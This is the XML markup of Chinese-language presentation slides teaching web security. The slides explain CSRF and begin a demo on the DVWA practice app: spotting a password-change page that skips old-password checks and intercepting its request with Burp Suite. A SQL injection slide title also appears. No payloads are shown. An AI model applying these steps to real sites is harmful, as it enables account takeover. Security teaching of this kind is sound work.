            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>发起的，所以会根据</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="130">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>信息以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>的 权限处理该请求，导致来自</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-5">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="95">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:latin typeface="宋体"/>
                <a:cs typeface="宋体"/>
              </a:rPr>
              <a:t>的恶意代码被执行。</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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1115896"/>
            <a:ext cx="117221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CSR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击场景</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1373417"/>
            <a:ext cx="3463925" cy="965200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="74295" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</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Damn</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是一个用来进行安全脆弱性鉴定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP/MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </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应用，简单地说</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>就是一个很容易受到攻击的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP/MySQL  </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eb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用程序。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>V</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A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>主要用来帮助安全专业人员在法律环境中测试他们的技能和 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>工具，帮助</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开发人员更好地了解保护</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应用程序的过程。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>平台上来演示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="96400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）使用管理</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>员</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>身份登录</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>V</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A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>进入修改密码页面进行密码修改，如图所示， </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在这个页面中可以发现，修改密码时未对原密码进行验证，也就是说，不需要知 道原密码就可以修改密码，由此判断此页面可能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526163" y="3254029"/>
            <a:ext cx="603885"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管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>密码修改</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1642757" y="2343911"/>
            <a:ext cx="2402586" cy="918972"/>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644281" y="2348483"/>
            <a:ext cx="2396490" cy="909955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2396490" h="909954">
                <a:moveTo>
                  <a:pt x="0" y="909828"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2396490" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2396490" y="909828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="909828"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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8931" y="408305"/>
            <a:ext cx="4384675" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4384675" h="2465070">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2465070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="2465070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681615" y="2462657"/>
            <a:ext cx="1031240" cy="137160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1031239" h="137160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031240" y="137159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031239" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4712855" y="101485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EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755027" y="414401"/>
            <a:ext cx="4371975" cy="2452370"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:ln w="12954">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900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1826895">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="EFEDE3"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="35">
                <a:solidFill>
                  <a:srgbClr val="EFEDE3"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>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73417"/>
            <a:ext cx="3390900" cy="476884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="66675" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="17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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在修改密码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，使</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是用于攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用程序的集 成平台）拦截请求，拦截到的请求报文如图所</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341630" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="50">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>观察请求，发现没有一次性</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
